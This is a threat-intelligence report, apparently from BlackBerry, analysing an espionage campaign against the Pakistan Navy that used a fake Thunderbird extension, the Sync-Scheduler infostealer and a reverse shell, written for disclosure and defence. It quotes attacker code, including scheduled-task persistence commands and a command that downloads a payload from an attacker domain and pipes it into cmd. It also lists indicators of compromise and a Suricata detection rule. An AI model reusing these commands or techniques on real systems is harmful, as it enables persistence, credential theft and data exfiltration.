11/18/2024 | News release | Distributed by Public on 11/19/2024 09:14
In early September, as part of the BlackBerry Threat Research and Intelligence team’s continuous monitoring of cyber activities across the Indian subcontinent, we came across an interesting PDF lure which at a first glance appeared to be an internal IT communication for the Pakistan Navy.
As we pivoted off this artifact and followed its digital footprints, we came across a web of interlinking infrastructure, artifacts of various filetypes that appeared to have an espionage theme and whose purpose was ultimately to deliver a stealthy infostealer to the targeted victims.
As we delved deeper into this campaign, we found that several of the Tactics, Techniques, and Procedures (TTPs) overlapped with those previously seen being used by two other prominent threat groups; however, we felt there was not enough evidence to warrant an attribution at this time.
In this blog, we’ll examine the full attack chain of this unknown threat actor, and provide actionable recommendations for remediation.
The initial lure in this campaign was a PDF document that was designed to look like an internal Pakistan Navy IT memo containing instructions on the integration of Axigen Thunderbird for secure email communications. This lure document contains an embedded URL used to obtain the required files, with targeted users being directed to download and install them.
At a first glance, the download link appears to conform to that of a legitimate Pakistan Navy URL, with the use of a secure protocol and “paknavy” domain name.
Figure 1: Pakistan Navy initial lure document.
However, in this case the threat actor is using a malicious search engine optimization (SEO) poisoning technique known as typo-squatting, since legitimate Pakistan Navy URLs conform to a “paknavy.gov.pk” pattern.
Legitimate URL | Fake URL |
https://www.naknavy.gov.pk/ | https://www[.]paknavy[.]rf[.]gd/ |
Table 1: Typosquatted “Paknavy” URL.
Upon inspection of the fake URL’s page located at “hxxps://paknavy[.]rf[.]gd”, we found it contained code designed to verify that the target environment has JavaScript enabled before the user interacts with the malicious Thunderbird extension packaged within the ZIP file (Axigen_Thunderbird.zip).
Table 2: Paknavy[.]rf[.]gd: JavaScript enabled on victim environment check.
At this stage it is safe to assume that the threat actor very likely had prior knowledge of the Pakistan Navy's use of Axigen mail servers along with Thunderbird as their email client.
As the next stage of the attack, the threat actor crafted a custom Axigen user manual for the installation of a malicious Thunderbird extension, specifically tailored for this campaign. This level of dedication plus the time and resources the group put into crafting such a detailed document indicates a highly targeted modus operandi.
Figure 2: Fake user manual for a malicious Thunderbird extension.
Once an unwitting user follows the fake instruction manual and installs the malicious extension in their Thunderbird email client, the client displays the title: “Mail Files Downloader.”
The extension then displays a login form designed specifically for “@paknavy.gov.pk” email addresses, misleading the victim into believing that upon entering their credentials they will be able to access and download their emails.
Figure 3: 'Mail Files Downloader' extension installed in Thunderbird.
Once the user enters their legitimate credentials and submits them via the fake login form, they are sent in the body of a HTTP POST request to “hxxps://updateschedulers[.]com/receive_credentials[.]php.”
If the server response includes “Credentials Received,” it triggers a downloadFile() function which in turn calls the following code:
downloadFile(atob("aHR0cHM6Ly91cGRhdGVzY2hlZHVsZXJzLmNvbS9maWxlX2Rvd25sb2FkLnBocD9sZj0=")+ms);. |
Table 3: Successful POST returned code.
The embedded base64 string decodes to “hxxps://updateschedulers[.]com/file_download[.]php?lf,” where “ms” is a variable representing the device’s user agent string. The getS() function is utilized to gather the user agent information, which is then used to identify the victim’s operating system (OS) by returning a corresponding abbreviation for whichever one is detected, which is then stored in the variable “ms.”
function getS() { const userAgent = navigator.userAgent; if (/windows phone/i.test(userAgent)) {return "WP";} if (/windows/i.test(userAgent)) {return "WIN";} if (/macintosh|mac os x/i.test(userAgent)) {return "Mac";} if (/android/i.test(userAgent)) {return "And";} if (/linux/i.test(userAgent)) {return "LIN";} if (/iphone|ipad|ipod/i.test(userAgent)) {return "iOS";} return "Unknown";} const ms = getS() |
Table 4: OS identification.
Depending on which OS is identified on the victim’s device, the threat actor’s command-and-control (C2) server will then respond by returning a correlating ZIP file titled “Mail_Files.zip.”
At the time of our investigation, while each operating system returned a corresponding ZIP file, only the Windows OS returned an actual payload intended for further exploitation. When queried from other OS’s, a ZIP was returned that is best described as a dummy folder containing benign documents or files.
We have a couple of theories about this. It may be because the threat actor was only interested in targeting Windows devices, or that they intend to target other OSes in future. Alternatively, they may be just using this process as an OS check to verify their payload is sent to the correct machines for detonation.
Figure 4: Execution chain diagram.
The final payload is a very stealthy and capable infostealer dubbed Sync-Scheduler by researchers at Cyfirma. It was first documented in March 2024, although we have found earlier samples that appear to be from at least mid-2023 based on their compilation timestamps.
The sample used in this particular campaign appears to be a newer version of the one previously documented by Cyfirma researchers earlier this year.
Authored in C++ and containing robust evasion and anti-analysis capabilities, Sync-Schedler's core functionality appears to have remained largely unchanged since previous iterations. Upon execution, the malware gathers some basic machine metadata such as the universally unique identifier (UUID), via the following Windows management instrumentation (WMI) query. It filters by UUID, which corresponds to the following regkey: HKLM\SYSTEM\HardwareConfig\
Figure 5: UUID WMI query.
This information is then sent (with a unique check-in string in the form: “uD=
Figure 6: Initial C2 checkin at packageupdates[.]net.
This C2 server is different from the one used in previously documented campaigns of Sync-Scheduler. Most notably, any attempts to manually navigate to it, bizarrely results in the user being redirected to a Chinese Government website, which is the same one that was seen with the older version of the infostealer.
Figure 7: Attempts to manually navigate to the C2 redirects the user to the legitimate site www.gov.cn.
One of the malware’s most potent evasion and anti-analysis techniques is the use of blocks of encrypted data that are only decrypted dynamically during runtime and whose purpose is to create persistence.
This is attained via the creation of several scheduled tasks, each one deceptively named after common legitimate windows software, including OneDrive, Skype, and WindowsUpdate. This is an attempt by the threat actor to make these tasks appear non-threatening. The tasks are configured to run one after the other, staggered in roughly three-hour intervals.
Full Command: |
cmd.exe /c " schtasks /create /tn "OneDrive" /tr "cmd" /sc once /st 09:30 /f && schtasks /create /tn "Skype" /tr "cmd" /sc once /st 12:00 /f && schtasks /create /tn "WindowsUpdate" /tr "cmd" /sc once /st 15:00 /f |
Broken Down: |
schtasks /create /tn "OneDrive" /tr "cmd" /sc once /st 09:30 /f |
schtasks /create /tn "Skype" /tr "cmd" /sc once /st 12:00 /f |
schtasks /create /tn "WindowsUpdate" /tr "cmd" /sc once /st 15:00 /f |
Figure 8: Scheduled Task command line arguments.
Figure 9: Scheduled task creation.
The main purpose of Sync-Scheduler is to look for documents of specific common types, gather them in the same location and get them ready for exfiltration.
Buried deep within its code is a list of hardcoded strings corresponding with each document file-type. It uses this list to compare and replace each file-type extension with its correlating ID tag in the list shown below.
Document Type | ID Tag |
.doc | X367 |
.docx | X946 |
X567 | |
.zip | X052 |
.xls | X142 |
.xlsx | X375 |
.ppt | X593 |
.pptx | X842 |
Table 5: Document type and correlating ID tag.
Figure 10: Targeted file-type replacement strings.
After querying the victim host and finding a document that matches one of the targeted file-types, the extension is compared to those on its list. If it’s a match, it is replaced with the correlating hardcoded one and then copied to “C:\Users\
The file paths are logged to a file called “Registry.log” located in a newly created directory at “C:\Users\
The contents of the file are then encrypted with the Tiny Encryption Algorithm (TEA) prior to exfiltration to packageupdates[.]net.
Interestingly, some pivoting revealed another file that contained an almost identical scheduled task creation command structure to the one mentioned above. The only difference between the two was the use of “daily” as opposed to “once.”
This file, named KBUpdate.exe, had a compilation timestamp of 2024-06-03 09:32:31 and was found embedded inside a table in the database of the Microsoft Access file Tax_List1.accde. This highly unusual execution chain ensured it slipped well under the radar of most vendors when uploaded to VirusTotal (VT), in early August.
It also contained a program database (PDB) path which was similar in structure and seemed to match the one seen in our Sync-Scheduler sample.
File Name | PDB Path | Malware | Type |
Employee-Information-Pak-Navy-2024.exe | C:\Users\user\source\repos\MW-PAK-DataExt-Win\x64\Release\MW-PAK-DataExt-Win.pdb | Sync-Scheduler | InfoStealer |
KBUpdate.exe | C:\Users\user\source\repos\MW-BLACK-Shell\ | Black-Shell | Reverse Shell |
Figure 11: PDB comparison between the two files.
Upon analysis, we found significant overlaps in code base between KBUpdate.exe and the latest version of Sync-Scheduler (Employee-Information-Pak-Navy.exe) documented in this report. However, its core functionality and purpose are inherently different.
Figure 12: Code overlaps between Sync-Scheduler and Black-Shell.
The main difference that caught our attention was that KBUpdate.exe, which we are referring to as Black-Shell due to the codename in its PDB path, is best described as a malware reverse shell. In essence, this is a lightweight backdoor designed to facilitate communications between two hosts, or in this case, between a compromised victim device and an attacker-controlled machine.
Unlike Sync-Scheduler's Employee-Information-Pak-Navy.exe, which shares some of its codebase, Black-Shell has no capabilities to find, encrypt and then exfiltrate filesor anything else outside its reverse-shell functionality.
cmd.exe /c schtasks /create /tn EdgeUpdateTaskMachine /f /sc minute /mo 14 /tr "conhost.exe --headless cmd /c curl -o C:\Users\public\documents\pic.jpg mxmediasolutions[.]com/addc.php?mg=%computername%_%username% & more C:\Users\public\documents\pic.jpg | cmd" |
Table 6: Microsoft Access file scheduled task command linked to APT Bitter.
Retroactive hunts for similar malicious XPI files led to the discovery of four extension files targeting the Pakistan Navy, all of which masqueraded as an email-signing extension called ‘PN Mailbox E-signer,’ which also targeted the Thunderbird email client. Notably, the ‘E-signer’ extension files predate the ‘Axigen_Thunderbird.xpi’ extension, with the last modifications recorded in late May 2024. All four files were distributed within a short period in early June 2024.
Figure 13: Additional Thunderbird extension files masquerading as 'PN Mailbox E-signer' targeting the Pakistan Navy.
The ‘E-signer’ extensions contained obfuscated JavaScript, and once installed in Thunderbird, would prompt the user to input their password with the message: “Regular E-Signing will keep new mails updated.” Interestingly, the prompt did not request a username or email but instead used a hardcoded Pakistan Navy email address embedded in the JavaScript in Base64 format.
These files did not deliver any additional payload. The primary purpose of the JavaScript across all extensions was to capture the intended victim’s password and send it via a POST request to "hxxps://extension[.]webmailmigration[.]com/ajaxtension[.]php." The use of the Pakistan Navy logo, the specific naming of the extensions, and — most notably — the hardcoded email address, indicate that this group of files was highly targeted.
SHA256 | Name | First Seen | PakNavy Email |
9b318a99a95ae21a846d2997ac103ff9de07bcd60b3e7c2d391b4a227642f8fb | ilsc-313.zip | 2024-06-04 05:47:24 | ilsc-313[at]paknavy.gov.pk |
da9e4327bba989fc73280f3eee21cec9d13c1dc57a0df369ee95238c20846558 | pnlo-kamra.zip | 2024-06-05 05:08:35 | pnlo-kamra[at]paknavy.gov.pk |
3291fa800968f2becf4aedd2ca683b83274d4b863112dab406b1465faf904a3b | E-Sign.xpi | 2024-06-07 09:49:50 | adpn37[at]paknavy.gov.pk |
b8405d8d3447ea30ae49d147926faf3709d604b2ea25e92b63b3dc42eb724214 | Add-on.zip | 2024-06-12 16:40:27 | cicp_gsd[at]paknavy.gov.pk |
Figure 14: Activity timeline of this campaign.
Some additional and older but nonetheless interesting artefacts were found when we were tracing back through the network infrastructure of the C2 servers updateschedulers[.]com and packageupdates[.]net.
We observed that in and around March of this year, a series of files were uploaded to VirusTotal that formed part of an execution chain that was not too dissimilar from the one documented in this report. This chain, which started with a Pakistan-targeted lure, is notable because it is the first time that both updateschedulers[.]com and packageupdates[.]net were seen by BlackBerry researchers being leveraged as part of a malicious campaign, and (we believe) it’s highly likely they were being used by the same threat actor.
Another interesting thing we found is that one of the files in this particular execution chain was tagged by various sources online as being a WhisperGate sample, which was a highly destructive malware wiper deployed against Ukrainian targets in January 2022.
Upon further analysis, however, we can confirm this suspicion is false, and that the sample in question is in fact a simple downloader that leverages curl to retrieve the next file in the execution chain, which we identified as a version of Sync-Scheduler with an embedded PDB of C:\Users\user\Documents\Project-M\Visual Studio\MW-NEW_TELEMETRY-ExE\x64\Release\MW-NEW_TELEMETRY-ExE.pdb.
Figure 15: 'Benevolent Fund and Group Insurance' lure document.
Figure 16: Graph of network infrastructure.
IP Addresses | ASL - ASN |
185[.]27[.]134[.]139 | Wildcard UK Limited - 34119 |
185[.]227[.]82[.]38 | Access2.IT Group B.V - 208258 |
146[.]70[.]149[.]223 | M247 Europe SRL - 9009 |
146[.]70[.]149[.]216 | M247 Europe SRL - 9009 |
185[.]227[.]82[.]65 | Access2.IT Group B.V - 208258 |
146[.]70[.]80[.]58 | M247 Europe SRL - 9009 |
Table 7: IP address details corresponding with this campaign.
Domain | First Created | Last Updated | Last seen IP | Registrar |
paknavy[.]rf[.]gd | 2013-08-25 | 2024-09-06 | 31[.]22[.]4[.]234 | NameSilo, LLC |
updateschedulers[.]com | 2023-08-01 | 2024-10-19 | 185[.]227[.]82[.]37 | NameSilo, LLC |
packageupdates[.]net | 2023-12-12 | 2024-02-11 | 146[.]70[.]149[.]216 | PDR Ltd |
finance-gov-pk[.]rf[.]gd | 2013-08-25 | 2024-09-06 | 199[.]59[.]243[.]227 | Key Systems Gmbh |
extension.webmailmigration[.]com | 2024-03-28 | 2024-03-28 | 84[.]234[.]96[.]91 | GMO INTERNET, INC |
Table 8: Malicious domain details.
Figure 17: Victim geolocation for this campaign.
With attribution, one often finds that when you dig deeper, quite often a different picture emerges from the original asumption. This makes providing an accurate attribution a complex endeavor. Attackers often use techniques to mask their location and identity as well as employ "false flags" to mimic the TTPs of other known groups in order to "muddy the waters" and mislead investigators.
Where attribution is concerned for this latest campaign observed by BlackBerry, here’s what we know to date: the targeted victim, along with the TTPs observed and documented in this attack, point to a threat actor that possesses a relatively high degree of sophistication, capabilities and knowledge, with a likely motive of conducting espionage.
In addition, several of the TTPs we observed have distinct overlaps with a previously documented campaign conducted against Chinese-based entities by the group known as SideWinder — an Indian state aligned threat actor that has conducted espionage operations against Pakistani Government entities in the past.
On the other hand, BlackBerry observed many elements in this campaign that appear to align with prior operations attributed to APT Bitter — a South Asian threat group whose primary focus has been on conducting espionage operations against organizations and entities in South Asia, including China, Pakistan and Bangladesh, amongst others. Although APT Bitter has also been previously suspected to be Indian state aligned, this has never been definitively confirmed or proven. Observed elements apparently shared between the groups included overlapping network infrastructure, specific URL formatting, access vectors, and other TTPs.
Despite these overlaps and indications for both groups, at the time of writing this we do not feel there is a strong enough body of evidence to warrant a positive attribution to either of these groups, and will therefore consider this campaign as being perpetuated by an unknown group or nexus. However, as we continue our monitoring of threat actors in this particular geographic region, we will revisit our findings if more supporting evidence surfaces.
This investigation by BlackBerry researchers uncovered a sophisticated targeted attack perpetuated against the Pakistan Navy up until at least September 2024. Pivoting off the indicators of compromise (IoCs) revealed links to earlier campaigns going back as far as mid 2023, and highlights the ever-increasing complexity and persistence of modern cyberthreats targeting the Government and Defense sectors.
By following a strategic and highly considered approach, the threat actor employed advanced techniques, reconnaissance, and stealthy tooling to harvest credentials and exfiltrate sensitive information from its targets, which strongly indicates this unknown group’s probable interest in espionage and maritime intelligence.Conduct Regular User Awareness Training
The building, conducting and updating of a regular internal user awareness training program is one of the most cost-effective means of protecting your organization against cyber risks of all types. By continuously educating personnel and keeping them abreast of the latest developments in cyber threats, organizations of all sizes can build an excellent first line of defense to counter cyber-attacks. Regular training empowers team members with the confidence and knowledge to protect both themselves and the organization they represent.
Phishing Protection
Protection of the outermost layers of a business is essential when it comes to shielding your organization from phishing and social engineering attacks, as they rely on humans being the weakest links of the security chain within an organization. Therefore, a modern email security solution (ESS) or web filtering solution combined with user awareness training can go a long way in mitigating against this attack vector.
Endpoint Protection Solutions
Deploying an advanced AI-powered endpoint protection platform such as CylanceENDPOINT™ by BlackBerry can help protect against the threats described in this research.
Restrict JavaScript in the Browser
Through thorough and strict group polices, IT admins can preconfigure browser settings on managed devices to disable JavaScript on sensitive machines and networks. This goes a long way in protecting against execution chains which rely on JavaScript as part of their attack, such as the one used in the campaign described in this blog post.
Threat Intelligence
Having access to accurate and up-to-date threat intelligence is a critical component in building and maintaining an effective cyber defensive posture. This is because it will enable an organization to proactively identify and then mitigate potential threats before they escalate into fully blown cyberattacks. Threat intelligence delivers actionable insights into the latest TTPs being utilized by threat actors, enabling defenders to anticipate and build countermeasures against the newest attack methods.
File
SHA256 | Description |
da9e4327bba989fc73280f3eee21cec9d13c1dc57a0df369ee95238c20846558 | pnlo-kamra.zip |
9b318a99a95ae21a846d2997ac103ff9de07bcd60b3e7c2d391b4a227642f8fb | ilsc-313.zip |
b8405d8d3447ea30ae49d147926faf3709d604b2ea25e92b63b3dc42eb724214 | Add-on.zip |
3291fa800968f2becf4aedd2ca683b83274d4b863112dab406b1465faf904a3b | E-Sign.xpi |
43979c3e6ff055d7743c3bd53529b6e4359dcaa257e8b79db60bd629a4fff856 | E-Sign.xpi |
8fced2552e5b217bfc6d93a3c4d1cd7ac0c51a42180dbe0f56af2e6368637fb1 | E-Sign.xpi.ilsc-313 |
c0d62dea8d02d4fafbc298b7ed69cc93700078c3728e3a3acb88d2a2db91de40 | E-Sign.xpi.pnlo-kamra |
8e54b06a4c9452c23d4c9858437ecb0e6ef0f7030b7ef70264289bd6179ad69f | Axigen_Thunderbird.zip |
df8b7f0fe52fa86997f8d4e5c772ebdd1e84a247d678512a57bb198e6dd00ce8 | Axigen_Thunderbird.xpi |
5f9ef1e419a66d3eb7bb9b1c71006987667121127ceb59a73d3139b0f98b7d3b | UserManual-Axigen.pdf |
8021c3b1976805d4cec0ecc3e029cc7ba9616593b52dc3e94364645e9d99216b | NHQ letter dt 20 Aug 24(dpn).pdf |
f0287134946a49e7dedc1ee60faab0e4ed7244201a5b744d00781a0e59e6bb80 | popup.js |
54d3f21009acde870817cd42597447786f7c728183fa16966bdeebb1bc3c87e5 | KbUpdate.exe |
615727e8ed031ca82ae1799893d7b42831f3ed86a1dbc5b4f654d2b5646808b5 | Tax_List1.accde |
b40f8cf3a7a79eb65ef73df4e40d95c4c77596885a3fcfc0a6979961a26c0ba2 | 1.accde |
736315462b91943de9df6210db3bb52564982dd6c758d06ea79e3a404548569b | C:\$SYSTEMV0LUME1\smsse.exe, smsse.exe |
fc39ec35d767a2c0a178ca9874be8aaf87033f8b834ee8dcb57d3904516e4335 | GroupInsurance\a.html, ForMinistryofPost/PostalOffice.html, GroupInsurance/a.html, PostalOffice.html |
c31bf9075492dc093d0c76bd0b961e168c1804914edfca2c75ec09b2ce78ffdb | BenevolentFundGroupInsurance.zip |
81dffcecb3f5765b7ec19cb72b2d10fb56c68a26b82f3fe8b2f5aa715561e666 | GroupInsurance.zip |
11fdfdca21c73c87191fe7b80f1dc127253b52605aee17b9f65c3dc6ade369c0 | BenevolentFundAndGroupInsurance.zip, BenevolentFund.zip |
5e119ecef481dd008a24c8c389b4b63362e387d55cee1c4eb1cff48bcda3153d | GroupInsurance\GroupInsurance.txt.lnk, BenevolentFund.txt.lnk |
3e35834b72b475952ae60ea8479ebe3638e204df414a838dfe143081f6729d8e | image.jpg |
URL | Purpose |
paknavy[.]rf[.]gd | URL staging malware |
updateschedulers[.]com | Staging malware and credential harvesting |
packageupdates[.]net | Sync-Scheduler C2 |
hxxps://paknavy[.]rf[.]gd/Axigen_Thunderbird.zip | Malicious Thunderbird extension URL |
hxxps://updateschedulers[.]com/receive_credentials.php | Credential harvesting |
hxxps://updateschedulers[.]com/file_download[.]php?lf=ms | OS-specific payload delivery |
hxxps://finance-gov-pk[.]rf[.]gd/BenevolentFundAndGroupInsurance | Malicious Zip Archive URL |
hxxps://updateschedulers[.]com/image.jpg | Sync-Scheduler URL |
hxxp://packageupdates[.]net/r3diRecT/redirector/proxy[.]php | Exfiltration C2 and Redirector |
hxxps://updateschedulers[.]com/BenevolentFund[.]pdf | Lure document |
hxxps://extension.webmailmigration[.]com/ajaxtension[.]php | Credential harvesting |
mxmediasolutions[.]com | Staging malware |
185[.]27[.]134[.]139 | Last serving IP for paknavy[.]rf[.]gd |
185[.]227[.]82[.]38 | Last serving IP for updateschedulers[.]com |
146[.]70[.]149[.]223 | IP address resolution for packageupdates[.]net |
146[.]70[.]149[.]216 | IP address resolution for packageupdates[.]net |
185[.]227[.]82[.]65 | Black-Shell C2 |
146[.]70[.]80[.]58 | Sync-Scheduler C2 |
Other
Name | Description |
C:\Users\user\source\repos\MW-PAK-DataExt-Win\x64\Release\MW-PAK-DataExt-Win.pdb | PDB Path |
C:\Users\user\source\repos\MW-BLACK-Shell\x64\Release\MW-BLACK-Shell.pdb | PDB Path |
C:\Users\user\Documents\Project-M\Visual Studio\MW-NEW_TELEMETRY-ExE\x64\Release\MW-NEW_TELEMETRY-ExE.pdb | PDB Path |
C:\Users\ | Staging Directory |
C:\Users\ | Log File Directory |
MTX | Mutex Creation |
Yara Rules
rule targeted_SyncScheduler_Malware { strings: condition: |
Suricata Rule
alert http $HOME_NET any -> $EXTERNAL_NET any ( msg:"MALWARE: Sync-Scheduler Document Stealer POST request"; content:"POST"; http_method; flow:to_server,established; content:"proxy|2e|php"; nocase; http_uri; content:"uD="; nocase; http_client_body; content:"xifangtaiyang="; nocase; http_client_body; priority:1; sid:2051843; rev:1; ) |
Tactic | Technique/Sub-Technique | Context |
Gather Victim Host Information: Software T1592.002 | The threat actor leveraged prior knowledge of the target organization's reliance on Axigen mail servers and the Thunderbird email client to design customized phishing lures and tools that would resonate with these specific systems, and increase the likelihood of successful infiltration. | |
Develop Capabilities: Malware T1587.001 | The threat actor has used custom malware tailored to meet their specific operational objectives, including tools such as Sync-Scheduler, Black-Shell, and downloaders. | |
Stage Capabilities: Upload Malware T1608.001 | Malware was staged on adversary-controlled infrastructure designed to appear legitimate, facilitating multiple stages of the execution chain. | |
Phishing: Spearphishing Link T1566.002 | The adversary distributed PDFs containing malicious links intended to deliver an initial Zip archive; hxxps://paknavy[.]rf[.]gd/Axigen_Thunderbird.zip and hxxps://finance-gov-pk[.]rf[.]gd/BenevolentFundAndGroupInsurance. | |
Command and Scripting Interpreter: JavaScript T1059.007 | The threat actor utilised obfuscated JavaScript within the malicious extension file to harvest credentials and deploy the infostealer Sync-Scheduler. | |
Command and Scripting Interpreter: Windows Command Shell T1059.003 | Cmd.exe /c is used to create scheduled tasks in both Black-Shell and Sync-Scheduler. | |
Inter-Process Communication: Component Object Model T1559.001 | Sync-Scheduler uses the IWbemLocator COM interface (CLSID: 4590F811-1D3A-11D0-891F-00AA004B2E24) to execute a WMI query (SELECT * FROM Win32_ComputerSystemProduct) to gather the system's unique UUID. | |
Native API: T1106 | Sync-Scheduler has the ability to use multiple dynamically resolved API calls such as; VirtualAlloc, InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpAddRequestHeadersA, HttpSendRequestW, InternetReadFile, InternetCloseHandle, InternetSetOptionA, FindFirstFileW, FindNextFileW, FreeLibrary, CreateProcessA. | |
Execution,Persistence | Scheduled Task/Job: Scheduled Task: T1053.005 | Sync-Scheduler and Black-Shell both create scheduled tasks OneDrive, Skype, WindowsUpdate using schtasks /create to run cmd.exe. |
Execution,Persistence | Scheduled Task/Job: Scheduled Task: T1053.005 | The threat actor utilised a Microsoft Access file to execute “cmd.exe /c schtasks /create /tn EdgeUpdateTaskMachine /f /sc minute /mo 14 /tr "conhost.exe --headless cmd /c curl -o C:\Users\public\documents\pic.jpg mxmediasolutions[.]com/addc.php?mg=%computername%_%username% & more C:\Users\public\documents\pic.jpg | cmd." |
User Execution: Malicious Link T1204.001 | The adversary lures victims into clicking hyperlinks to deliver malicious files. | |
User Execution: Malicious File T1204.002 | The malicious extension files require the user to manually install them into the Thunderbird email client. Employee-Information-PakNavy.exe (Sync-Scheduler) relies on the victim to execute the file. | |
Windows Management Instrumentation T1047 | Sync-Scheduler uses the IWbemLocator to execute SELECT * FROM Win32_ComputerSystemProduct to gather the system's unique UUID. | |
Shared Modules T1129 | Sync-Scheduler uses LdrLoadDll to load Wininet.dll. | |
Deobfuscate/Decode Files or Information T1140 | Sync-Scheduler uses XOR operations to decrypt strings at runtime to avoid detection. | |
Deobfuscate/Decode Files or Information T1140 | The adversary leveraged the atob() function to decode its C2 address from Base64 within the malicious extension file. | |
Impersonation T1656 | The adversary impersonated key personnel within the Pakistan Navy and Government to deceive targets into downloading malware. | |
Masquerading: Masquerade Task or Service T1036.004 | The adversary created scheduled tasks named after common Windows software - OneDrive, Skype, WindowsUpdate and EdgeUpdateTaskMachine - to blend in with legitimate system tasks and avoid detection. | |
Masquerading: Masquerade File Type T1036.008 | Employee-Information-Pak-Navy-2024.exe was disguised as an Excel file. | |
Obfuscated Files or Information: Dynamic API Resolution T1027.007 | The adversary used dynamic API resolution to conceal malware characteristics and functionalities. | |
Obfuscated Files or Information: Encrypted/Encoded File T1027.013 | Sync-Scheduler encrypts the contents of the files it finds with the Tiny Encryption Algorithm (TEA) prior to exfiltration to packageupdates[.]net. | |
Input Capture: GUI Input Capture T1056.002 | The adversary used a deceptive login form packaged inside a Thunderbird extension file to mimic legitimate input fields, capturing user credentials and sending them to a remote C2 server. | |
File and Directory Discovery T1083 | Sync-Scheduler enumerates the victim’s filesystem for files matching the following extensions .doc, .docx, .pdf, .zip, .xls, .xlsx, .ppt, .pptx. | |
Automatic Collection T1119 | Once executed, Sync-Scheduler automatically collects, encrypts, and exfiltrates files to packageupdates[.]net | |
Data Staged: Local Data Staging T1074.001 | Employee-Information-PakNavy.exe used the folder “AppData\Romaing\System” to stage encrypted files for exfiltration. | |
Application Layer Protocol: Web Protocols T1071.001 | Sync-Scheduler uses HTTP protocol to communicate with the server | |
Exfiltration Over C2 Channel T1041 | Sync-Scheduler exfiltrates TEA-encrypted files to the C2 server. |
Related Reading:
The BlackBerry Research and Intelligence team is a highly experienced threat research group specializing in a wide range of cybersecurity disciplines, conducting continuous threat hunting to provide comprehensive insights into emerging threats. We analyze and address various attack vectors, leveraging our deep expertise in the cyberthreat landscape to develop proactive strategies that safeguard against adversaries.
Whether it's identifying new vulnerabilities or staying ahead of sophisticated attack tactics, we are dedicated to securing your digital assets with cutting-edge research and innovative solutions.